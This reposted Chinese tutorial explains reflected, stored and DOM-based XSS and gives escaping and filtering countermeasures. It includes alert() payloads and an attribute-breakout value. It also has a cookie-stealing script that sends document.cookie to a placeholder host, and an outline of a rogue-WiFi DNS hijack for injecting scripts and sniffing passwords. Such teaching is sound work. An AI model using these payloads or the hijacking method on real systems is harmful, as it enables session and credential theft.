再谈 XSS 攻击

Posted 计算机与网络安全

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了再谈 XSS 攻击相关的知识,希望对你有一定的参考价值。

一次性进群,长期免费索取教程,没有付费教程。


ID:Computer-network

(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。攻击分为三种,分别是:


(1)Reflected (基于反射的攻击)

(2)Stored (基于存储的攻击)

(3)DOM-based or local (基于DOM或本地的攻击)


Reflected XSS


基于反射的攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击。


例子:


(1)做个假设,当亚马逊在搜索书籍,搜不到书的时候显示提交的名称。


(2)在搜索框搜索内容,填入“<script>alert('handsome boy')</script>”, 点击搜索。


(3)当前端页面没有对返回的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。


http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>


结论:


如果只是1、2、3步做成功,那也只是自己折腾自己而已,如果第4步能做成功,才是个像样的攻击。


开发安全措施:


(1) 前端在显示服务端数据时候,不仅是标签内容需要过滤、转义,就连属性值也都可能需要。


(2) 后端接收请求时,验证请求是否为攻击请求,攻击则屏蔽。


标签:

<span><script>alert('handsome boy')</script></span>

转义:

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>

属性:


如果一个input的value属性值是

琅琊榜" onclick="javascript:alert('handsome boy')

就可能出现

<input type="text" value="琅琊榜" onclick="javascript:alert('handsome boy')">

点击input导致攻击脚本被执行,解决方式可以对script或者双引号进行过滤。

Stored XSS


基于存储的攻击,是通过发表带有恶意跨域脚本的帖子/文章,从而把恶意脚本存储在服务器,每个访问该帖子/文章的人就会触发执行。


例子:


(1) 发一篇文章,里面包含了恶意脚本

今天天气不错啊!<script>alert('handsome boy')</script>

(2) 后端没有对文章进行过滤,直接保存文章内容到数据库。


(3) 当这篇文章被查看的时候,包含的恶意脚本就会执行。


出现这种情况。


结论:


后端尽可能对提交数据做过滤,在场景需求而不过滤的情况下,前端就需要做些处理了。


开发安全措施:


(1) 首要是服务端要进行过滤,因为前端的校验可以被绕过。


(2) 当服务端不校验时候,前端要以各种方式过滤里面可能的恶意脚本,例如script标签,将特殊字符转换成html编码。


DOM-based or local XSS


基于DOM或本地的攻击。一般是提供一个免费的wifi,但是提供免费wifi的网关会往你访问的任何页面插入一段脚本或者是直接返回一个钓鱼页面,从而植入恶意脚本。这种直接存在于页面,无须经过服务器返回就是基于本地的攻击。


例子1:


(1)提供一个免费的wifi。


(2)开启一个特殊的DNS服务,将所有域名都解析到我们的电脑上,并把Wifi的DHCP-DNS设置为我们的电脑IP。


(3)之后连上wifi的用户打开任何网站,请求都将被我们截取到。我们根据http头中的host字段来转发到真正服务器上。


(4)收到服务器返回的数据之后,我们就可以实现网页脚本的注入,并返回给用户。


(5)当注入的脚本被执行,用户的浏览器将依次预加载各大网站的常用脚本库。

这个其实就是wifi流量劫持,中间人可以看到用户的每一个请求,可以在页面嵌入恶意代码,使用恶意代码获取用户的信息,可以返回钓鱼页面。


例子2:


(1) 还是提供一个免费wifi;


(2) 在我们电脑上进行抓包;


以上测试,在51job页面登录时进行抓包,可以获取帐号密码。


结论:


这攻击其实跟网站本身没有什么关系,只是数据被中间人获取了而已,而由于HTTP是明文传输的,所以是极可能被窃取的。


攻击的特点就是:尽一切办法在目标网站上执行非目标网站上原有的脚本。本地的攻击的示例2其实不算攻击,只是简单流量劫持。前两种攻击是我们开发时候要注意的,而流量劫持的则可以使用HTTPS提高安全性。

ID:Computer-network

【推荐书籍】

以上是关于再谈 XSS 攻击的主要内容,如果未能解决你的问题,请参考以下文章

XSS基础学习

通过脚本片段绕过XSS防御

XSS 攻击实战

XSS攻击原理以及手段

xss攻击的危害都有哪些?

xss攻击